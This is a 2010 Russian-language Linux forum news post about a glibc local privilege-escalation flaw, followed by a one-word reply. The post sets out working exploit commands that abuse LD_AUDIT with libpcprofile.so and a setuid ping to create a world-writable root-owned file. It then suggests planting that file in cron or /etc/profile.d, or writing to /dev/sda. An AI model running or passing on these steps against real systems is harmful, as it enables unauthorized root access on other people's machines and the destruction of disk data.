anonymous@RULINUX.NET~# Last login: 2024-11-05 18:31:51
Регистрация Вход Новости | Разметка | Пользователи | Галерея | Форум | Статьи | Неподтвержденное | Трекер | Правила форума | F.A.Q. | Ссылки | Поиск
Новости - Security [RSS]
[#] [Добавить метку] [Редактировать]
Скрыть

Ещё одна дыра в glibc

Вскоре после обнаружения предыдущей дыры (  http://www.lor-ng.org/message.php?newsid=30924 ), которая, однако, работала только на redhat-based дистрибутивах, опубликованы сведения о новой дырке в основной библиотеке большинства дистрибутивов -- glibc. На этот раз подвержены большинство дистрибутивов. Желающие узнать механизм работы могут посмотреть его по ссылке, остальным интересующим можно сразу перейти к изучению эксплоита:

  1.  umask 0
  2.  ls -l /lib/libpcprofile.so # проверяем наличие необходимой библиотеки; можно использовать и другие библиотеки
  3.  LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/world_writeable_file" ping
  4.  ls -l /world_writeable_file # проверяем наличие вновь созданного файла и права на него (должны быть 0666)
  5.  

Дальше всё зависит только от вашей фантазии. Авторы на opennet-е запихнули этот файл в список заданий cron-а. Другой вариант -- поместить его в /etc/profile.d. Выразившие особое рвение предлагают сразу писать в /dev/sda.


>>> Подробнее

anonymous(*) (2010-10-26 10:28:42)
Подтверждено: Root-msk(*) (2010-10-26 11:41:46)

[Ответить на это сообщение]
[#] [Добавить метку] [Редактировать] Ответ на: Ещё одна дыра в glibc от anonymous 2010-10-26 10:28:42
avatar
Скрыть

Re: Ещё одна дыра в glibc

Решето!

spaceivan(*)(2010-10-26 10:38:22)

Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20101016 Gentoo Firefox/3.6.9
[Ответить на это сообщение]
Этот тред читают 1 пользователь:
Анонимных: 1
Зарегистрированных: 0


(c) 2010-2020 LOR-NG Developers Group
Powered by TimeMachine

Valid HTML 4.01 Transitional Правильный CSS!